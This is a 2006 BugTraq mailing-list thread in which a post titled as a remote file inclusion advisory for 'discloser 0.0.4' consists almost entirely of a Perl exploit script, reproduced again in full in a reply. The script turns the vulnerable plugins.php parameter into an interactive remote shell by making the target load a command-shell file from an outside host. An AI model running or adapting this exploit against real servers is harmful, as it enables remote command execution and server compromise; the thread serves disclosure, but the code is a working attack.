BugTraq
Back to list
|
Post reply
discloser 0.0.4 Remote File Inclusion (with Exploit)
Aug 16 2006 09:51PM
dr t3rr0r1st yahoo com
(1 replies)
#!/usr/bin/perl
########################################################################
###################
# Aria-Security.net Advisory #
# Discovered by: Dr.t3rr0r1st #
# < www.Aria-security.net > #
# Gr33t to:Outlaw & A.u.r.a & HessamX & Cl0wn & DrtRp #
# Special Thanx To All Aria-Security Users #
########################################################################
###################
use LWP::UserAgent;
print "\n === discloser 0.0.4 Remote File Inclusion\n";
print "\n === Discovered by OutLaw .\n";
print "\n === www.Aria-Security.Net\n";
$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];
if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}
while()
{
print "[Shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n Could not connect !\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;
if (!$cmd) {print "\nPlease type a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/)
{print "\n Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^<b>Fatal.error/) {print "\n Invalid Command\n"}
if($return =~ /(.*)/)
{
$freturn = $1;
$freturn=~ tr/[ê]/[\n]/;
print "\r\n$freturn\n\r";
last;
}
else {print "[Shell] \$";}}}last;
sub usage()
{
print " Usage : discloser.pl [host] [cmd shell location] [cmd shell variable]\n";
print " Example : fusion.pl http://site.com/path http://www.shell.com/cmd.txt cmd\n";
exit();
}
[ reply ]
Re: discloser 0.0.4 Remote File Inclusion (with Exploit)
Aug 17 2006 08:04PM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
########################################################################
###################
# Aria-Security.net Advisory #
# Discovered by: Dr.t3rr0r1st #
# < www.Aria-security.net > #
# Gr33t to:Outlaw & A.u.r.a & HessamX & Cl0wn & DrtRp #
# Special Thanx To All Aria-Security Users #
########################################################################
###################
use LWP::UserAgent;
print "\n === discloser 0.0.4 Remote File Inclusion\n";
print "\n === Discovered by OutLaw .\n";
print "\n === www.Aria-Security.Net\n";
$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];
if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}
while()
{
print "[Shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n Could not connect !\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;
if (!$cmd) {print "\nPlease type a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/)
{print "\n Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^<b>Fatal.error/) {print "\n Invalid Command\n"}
if($return =~ /(.*)/)
{
$freturn = $1;
$freturn=~ tr/[ê]/[\n]/;
print "\r\n$freturn\n\r";
last;
}
else {print "[Shell] \$";}}}last;
sub usage()
{
print " Usage : discloser.pl [host] [cmd shell location] [cmd shell variable]\n";
print " Example : fusion.pl http://site.com/path http://www.shell.com/cmd.txt cmd\n";
exit();
}
[ reply ]